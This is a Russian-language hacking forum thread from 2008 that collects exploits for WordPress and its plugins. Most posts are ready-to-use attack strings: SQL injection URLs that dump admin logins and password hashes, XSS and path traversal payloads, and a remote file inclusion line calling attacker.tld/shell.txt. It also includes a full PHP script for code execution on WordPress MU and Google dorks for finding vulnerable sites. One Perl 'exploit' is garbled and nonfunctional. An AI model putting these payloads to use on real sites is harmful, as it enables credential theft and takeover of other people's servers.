http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php
Только на Windows:
Код HTML:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..
\index.php
XSS:

Код HTML:
http://site/wp-admin/edit.php?page=wp-db-backup.
php&backup=%3Cscript%3Ealert(document.
cookie)%3C/script%3E

XSS: wp-cat2tag converter:
Код HTML:
http://localhost/wp/wp-admin/admin.php?import=wp-cat2tag&--><script>alert(/XSS/)</script>
Уязвимы версии WordPress <= 2.0.11 и потенциально последующие версии (2.1.x, 2.2.x и 2.3.x).

Solide Snake 20.01.2008 14:38
Wordpress plugin WP-Forum 1.7.4 Remote SQL Injection Vulnerability
 
Wordpress plugin WP-Forum 1.7.4 Remote SQL Injection Vulnerability

Код:
            remote sql injection exploit
###############################################################
                 

# >>> -::DESCRIPTION== >> WordPress forum plugin by Fredrik Fahlstad. Version: 1.7.4.

# >>> exploit: 1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_users where id=1/*     

(wp_tbv_users)

# >>> google: Fredrik Fahlstad. Version: 1.7.4.

# >>> author  websec Team  ./members =====>  Virus_C, Refresh , Virusa

# >>> page : hacking.ge

###############################################################

this is example

http://www.xxx.com/?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*

# milw0rm.com [2008-01-19]

_-Ramos-_ 22.01.2008 14:03
XSS in plugin wp-slimstat 0.92 para Wordpress

PoC directamente:
Код:
http://wordpress-web-blog.com/wp-admin/index.php?page=wp-sl
imstat/wp-slimstat.php?panel=1&fi=/feed/&ff=1&ft=[xss]
PoC En Perl:
Код:
# Wordpress 2.3 0day exploit – http://xssworm.com
#
# A bug exist in wordpress 2.3 that allow hacker to
# steal blog cookie from wordpress blogmin.
#
# To exploit scripting bug the attacker make link
# to URL of slimstat with XSS shellcode and force
# blog admin to hit link by embedding into fish
# email or making blogmin follow interesting links.
# Also hacker can embed into refer or trackback
# to inject scripting into wordpress dashboard or
# make blogmin visit malicious resource when viewing
# he’s blog.
#
#
# Status: not patched published 0day vulnerability
# Vendor: wordpress.org
# Credit: http://xssworm.com
# Discovery: 1st November 2007
# Exploit developer: Fracesco Vaj (vaj@xssworm.com)
#
# Instruction:
# To execute exploit for wordpress you will need perl or linux
#
# Usage:
#
# Execute with perl or linux as:
# perl wordpress-2.3-0day-xss-injection-bug.pl
#
# Hacker will get prompts for target information.
# Please do not use for irresponsible hacking or to make money.
# Disclaimer: XSSWORM.COM is not responsible.
#
#
 
#use Net::DNS:Simple;
#use Math;
use Socket;
 
print "Welcome. What is target email address of wordpress blog admin : \n";
my $target = <stdin>;
print "ok target is $target\n";
sleep(3);
print "ok What is address of wordpress blog : \n";
sleep(5); my $address = <stdin>;
print "ok target is $target\n";
sleep(6);
# print "testing"
print "ok using /wp-admin/?page=wp-slimstat/wp-slimstat.php?panel=1&amp;ft=SHELLCODE\n";
print "\n\n — CUT OUTPUT HERE — \n\n";
print "HELO xssworm.com\n";
print "RSET\n";
PRINT "MAIL FROM: <xssworm@hotmail.com>\n";
print "RCPT TO: &lt;$target&gt;\n";
print "DATA\n”; print “Free x pciture and movies at $address\n";
print "\r\n.\r\nquit\r\n";
print "\n\n — END OF OUTPUT CUT HERE –\n";
print "";
print "Ok now you neeed to cut the exploit above and paste it to:\n";
print "$address : 25 \n";
print "Shellcode by vaj@xssworm.com c. 2007\n";
print "End of attack.\n";
print "";
#print "Debug mode on"
#print "XSS initialized"
#payload
sleep(1); return(0);
# snips</xssworm@hotmail.com></stdin></stdin>

ettee 23.01.2008 17:45
Full path disclosure:
Код:
/wp-admin/theme-editor.php?page=
/wp-admin/plugins.php?page=
/wp-admin/plugin-editor.php?page=
/wp-admin/profile.php?page=
/wp-admin/users.php?page=
/wp-admin/options-general.php?page=
/wp-admin/cat-js.php?page=
/wp-admin/inline-uploading.php?page=
/wp-admin/options.php?page=
/wp-admin/profile-update.php?page=
/wp-admin/sidebar.php?page=
/wp-admin/user-edit.php?page=
/wp-admin/admin.php?page=
/wp-admin/admin-footer.php
/wp-admin/admin-functions.php
/wp-admin/edit-form.php
/wp-admin/edit-form-advanced.php
/wp-admin/edit-form-comment.php
/wp-admin/edit-link-form.php
/wp-admin/index.php?page=
/wp-admin/link-manager.php?page=
/wp-admin/link-add.php?page=
/wp-admin/link-categories.php?page=
/wp-admin/link-import.php?page=
/wp-admin/edit-page-form.php
/wp-admin/menu.php
/wp-admin/menu-header.php
/wp-admin/import/blogger.php
/wp-admin/import/dotclear.php
/wp-admin/import/greymatter.php
/wp-admin/import/livejournal.php
/wp-admin/options-writing.php?page=
/wp-admin/options-reading.php?page=
/wp-admin/options-discussion.php?page=
/wp-admin/options-permalink.php?page=
/wp-admin/options-misc.php?page=
/wp-admin/import.php?page=
/wp-admin/import/mt.php
/wp-admin/import/rss.php
/wp-admin/import/textpattern.php
/wp-admin/bookmarklet.php?page=

Elekt 24.01.2008 06:35

=====================

Изменения в версиях для общего ознакомления:

_http://trac.wordpress.org/changeset?old_path=tags%2F2.3.1&old=6528&new_path= tags%2F2.3.2&new=6528

_http://trac.wordpress.org/query?component=Security&milestone=2.3.2&order=pri ority

=====================

Описание: Перебор логина/пароля в обход логирования.

Возможность определение логина, перебора пароля через куки(wp-login.php), базик-авторизацию(wp-app.php).

PHP код:
function wp_login()

__('<strong>ERROR</strong>: Invalid username.');
__('<strong>ERROR</strong>: Incorrect password.'); 
========================

Описание: Раскрытие COOKIEHASH.

Иногда бывают траблы с формированием куков для эксплоита.
Обычно это происходит, если блог работает на несколько доменов/субдоменов сразу.
"siteurl" добытый из базы не подходит.
В хидере нас вернется пустой кукис с префиксом.

/wp-login.php?action=logout

/wp-pass.php

=====================

Описание: Права админа: Запись в wp-config.php

Отстутствие проверки имени файла при записи.

Читать в wp-config.php нельзя. Но при записи забыли поставить проверку.

Можно указать свой удаленный сервер и поадминить блог через свою бд.


Читать нельзя:
/wp-admin/templates.php?file=wp-config.php

Но можно писать:
/wp-admin/templates.php
POST: newcontent=<?php;phpinfo();?>&action=update&file=w p-config.php

=====================

Описание: Passive XSS $_POST['pages-sortby']

Права: админ

Примеры уязвимого кода:

/wp-admin/widgets.php

PHP код:
function wp_widget_pages_control() {

        $sortby = stripslashes( $_POST['pages-sortby'] );

                    <option value="post_title"<?php selected$options['sortby'], 'post_title' ); ?>><?php _e('Page title'); ?></option>
                    <option value="menu_order"<?php selected$options['sortby'], 'menu_order' ); ?>><?php _e('Page order'); ?></option>
                    <option value="ID"<?php selected$options['sortby'], 'ID' ); ?>><?php _e'Page ID' ); ?></option>
=====================

Описание: Хранение пароля и логина админа к мылу в открытом виде в бд, отображение в админке.

/wp-admin/options-writing.php

wp_options
-mailserver_login
-mailserver_pass

=====================

Описание: При импорте блога, если присутствуют посты без автора(анонимы), создается юзверь с дефолтными настройками.

Тоесть возможно существование учеток с дефолтным паролем "password".

Примеры уязвимого кода:

/wp-admin/import/greymatter.php

PHP код:
                $user_id username_exists($post_author);
                if (!$user_id) {    // if deleted from GM, we register the author as a level 0 user
                    $user_ip="127.0.0.1";
                    $user_domain="localhost";
                    $user_browser="server";
                    $user_joindate="1979-06-06 00:41:00";
                    $user_login=$wpdb->escape($post_author);
                    $pass1=$wpdb->escape("password");
                    $user_nickname=$wpdb->escape($post_author);
                    $user_email=$wpdb->escape("user@deleted.com");
                    $user_url=$wpdb->escape("");
                    $user_joindate=$wpdb->escape($user_joindate);

                    $user_info = array("user_login"=>$user_login"user_pass"=>$pass1"user_nickname"=>$user_nickname"user_email"=>$user_email"user_url"=>$user_url"user_ip"=>$user_ip"user_domain"=>$user_domain"user_browser"=>$user_browser"dateYMDhour"=>$user_joindate"user_level"=>0"user_idmode"=>"nickname");
                    $user_id wp_insert_user($user_info);
                    $this->gmnames[$postinfo[1]] = $user_id

=====================

halkfild 28.01.2008 14:52
# Author : Houssamix From H-T Team
# Script : Wordpress Plugin fGallery 2.4.1
# Download : http://www.fahlstad.se/wp-plugins/fgallery/
# BUG : Remote SQL Injection Vulnerability
# Dork : inurl:/wp-content/plugins/fgallery/

## Vulnerable CODE :
~~~~~~~ /wp-content/plugins/fgallery/fim_rss.php ~~~~~~~~~~~~~

PHP код:
$cat $wpdb->get_row("SELECT * FROM $cats WHERE id = $_GET[album]");
$images $wpdb->get_results("SELECT * FROM $imgs WHERE cat = $_GET[album] AND status = 'include'"); 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~

# Exploit :
[Target.il]/[wordpress_path]//wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--

Example
Цитата:
http://site.il/wordpress/wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--

src='http://site.il/wordpress/wp-content/fgallery/thumb_admin:051e3db4c8eee42d7c93df48dffe4d5f:marku s@swimatyourownrisk.com' /><br>5 markus@swimatyourownrisk.com Thu, 01 Jan 1970 00:00:00 +0100

# Script : Wordpress Plugin WP-Cal
# Download : http://www.fahlstad.se/wp-plugins/wp-cal/
# BUG : Remote SQL Injection Vulnerability
# Dorks : inurl:/wp-content/plugins/wp-cal/
inurl:/WP-Cal/

## Vulnerable CODE :
~~~~~~~ /wp-content/plugins/wp-cal/functions/editevent.php ~~~~~~~~~~~~~
PHP код:
$id $_GET['id'];
    $event $wpdb->get_row("SELECT * FROM $table WHERE id = $id"); 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~

# Exploit :
/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6%20from%20wp_users--

example :
Цитата:
http://site.il/wordpress/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6%20from%20wp_users--

Solide Snake 31.01.2008 11:49
Wordpress Plugin wp-adserve (adclick.php) SQL Injection

SQL Injection:

Код:
http://www.site.com/wp-content/plugins/wp-adserve/adclick.php?id=-1%20union%20select%20concat(0x7c,user_login,0x7c,user_pass,0x7c)%20from%20wp_users
Для поиска вводим:

Код:
allinurl: "wp-adserve"

Wordpress Plugin WassUp 1.4.1 Remote SQL Injection

SQL Injection:

Код:
http://www.site.com/wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%200,1,2,concat(0x7c,user_login,0x7c,user_pass,0x7c),3,4,0x7c,6,0x7c,8,9,10%20%20from%20wp_users
Для поиска вводим:

Код:
allinurl: "plugins/wassup"
(c)

iddqd 02.02.2008 23:35
Wordpress Plugin dmsguestbook 1.7.0 Multiple Remote Vulnerabilities

PoC:

http://milw0rm.com/exploits/5035

Wordpress Plugin Wordspew Remote SQL Injection Vulnerability

PoC:

http://milw0rm.com/exploits/5039

iddqd 04.02.2008 00:11
Wordpress Pluging wp-footnotes 2.2

Multiple XSS

Код:
http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_foot
notes_current_settings[priority]="><script>alert("XSS"
)</script>

http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_foot
notes_current_settings[style_rules]=</textarea><script>alert("
XSS")</script>

http://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current
_settings[pre_footnotes]=</textarea><script>alert("XSS"
)</script>

http://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current
_settings[post_footnotes]=</textarea><script>alert(":-
(")

Solide Snake 04.02.2008 16:04
Wordpress Plugin st_newsletter Remote SQL Injection

SQL Injection

Код:
wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users
Для поиска:

Код:
allinurl :"wp-content/plugins/st_newsletter"
allinurl :"shiftthis-preview.php"
(c)

iddqd 05.02.2008 19:32
Wordpress MU < 1.3.2 active_plugins option Code Execution

Exploit:

PHP код:
<?php
/*
WordPress [MU] blog's options overwrite

Credits : Alexander Concha <alex at buayacorp dot com>
Website : http://www.buayacorp.com/
Advisory: http://www.buayacorp.com/files/wordpress/wordpress-mu-options-overwrite.html

This exploit uses active_plugins option to execute arbitrary PHP
*/
include_once './class-snoopy.php';

// Fix Snoopy
class SnoopyExt extends Snoopy {
    function _prepare_post_body($formvars$formfiles) {
        if ( is_string($formvars) ) {
            return $formvars;
        }
        return parent::_prepare_post_body($formvars$formfiles);
    }
}

set_time_limit);

// Any user with 'manage_options' and 'upload_files' capabilities
$user 'user';
$pass '1234';
$blog_url 'http://localhost.localdomain/mu/';
$remote_file ''// relative path to wp-content
$local_file ''// the contents of this file, if any, will be uploaded

$snoopy = new SnoopyExt();

$snoopy->maxredirs 0;
$snoopy->cookies['wordpress_test_cookie'] = 'WP+Cookie+check';
$snoopy->submit("{$blog_url}wp-login.php", array('log' => $user'pwd' => $pass));

$snoopy->setcookies(); // Set auth cookies for future requests

if ( empty($remote_file) ) {
    // Upload a new file
    $snoopy->_submit_type 'image/gif';
    $snoopy->submit("{$blog_url}wp-app.php?action=/attachments"get_contents());

    if ( preg_match('#<id>([^<]+)</id>#i'$snoopy->results$match) ) {
        $remote_file basename($match[1]);
    }
}
if ( empty($remote_file) ) die('Exploit failed...');

// Look for real path
$snoopy->fetch("{$blog_url}wp-admin/export.php?download");

if ( preg_match("#<wp:meta_value>(.*$remote_file)</wp:meta_value>#"$snoopy->results$match) ) {
    $remote_file preg_replace('#.*?wp-content#'''$match[1]);
}
if ( empty($remote_file) ) die('Exploit failed...');

// It asumes that file uploads are stored within wp-content 
$remote_file '../' ltrim($remote_file'/');

$snoopy->fetch("{$blog_url}wp-admin/plugins.php");

// Recover previous active plugins
$active_plugins = array();
if ( preg_match_all('#action=deactivate&([^\']+)#'$snoopy->results$matches) ) {
    foreach ($matches[0] as $plugin) {
        if ( preg_match('#plugin=([^&]+)#'$plugin$match) )
            $active_plugins[] = urldecode($match[1]);
    }
    print_r($active_plugins);
}
$active_plugins[] = $remote_file;

// Fetch a valid nonce
$snoopy->fetch("{$blog_url}wp-admin/options-general.php");

if ( preg_match('#name=._wpnonce. value=.([a-z\d]{10}).#'$snoopy->results$match) ) {

    // Finally update active_plugins
    $snoopy->set_submit_normal();
    $snoopy->submit("{$blog_url}wp-admin/options.php",
        array(
            'active_plugins' => $active_plugins,
            '_wpnonce' => $match[1],
            'action' => 'update',
            'page_options' => 'active_plugins',
        ));
}

function get_contents() {
    global $local_file;

    return file_exists($local_file) ? file_get_contents($local_file) : '<?php echo "Hello World " . __FILE__; ?>';
}
?>

# milw0rm.com [2008-02-05]

FraiDex 15.02.2008 22:14
Wordpress Plugin Simple Forum 1.10-1.11 SQL Injection Vulnerability

example
Код:
http://xxxxx/forums?forum=xxxx&topic= (expliot)

EXPLOİT 1 :

Код:
-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*


EXPLOİT 2 :

Код:
SİMETİMES YOU CANT SEE (xxxx&topic) SOO USE THİS EXPLOİT AFTER forum=xxx(number)

example

Код:
www.xxxxx/forums?forum=1(expliot)
&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
Wordpress Plugin Simple Forum 2.0-2.1 SQL Injection Vulnerability

example :
Код:
http://www.xxx.com/sf-forum?forum=[exploit]
EXPLOIT 1 :

Код:
-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
exploit 2 :

Код:
-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*
(с)milw0rm.com

gibson 17.02.2008 03:26
Wordpress Photo album Remote SQL Injection Vulnerability

EXAMPLE
Цитата:
http://xxxxxxxx/?page_id=13&album= [exploit]
Сплоит
Цитата:
user_name&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201
зы
Цитата:
allinurl: page_id album "photo"
Auth S@BUN http://milw0rm.com/exploits/5135

iddqd 27.02.2008 17:32
Wordpress Plugin Sniplets 1.1.2 Multiple Vulnerabilities
 
RFI

Register Globals: ON

PoC:

Код:
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.
php?libpath=http://attacker.tld/shell.txt?
XSS

Register Globals: ON

PoC:

Код:
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/warning.php
?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/notice.php?
text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/inset.php?t
ext=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/submenu.php?ur
l=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/scrip
t%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=
%3Cli%3E
Register Globals: Off

Код:
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/pager.php?page
=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script
%3E
Remote Code Execution

Register Globals: ON

PoC:

Код:
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=
%3C?php%20system(%22ls%22);


Время: 12:10
Страница 1 из 4 1 2 3 4 >
Показывать 40 сообщений этой темы на одной странице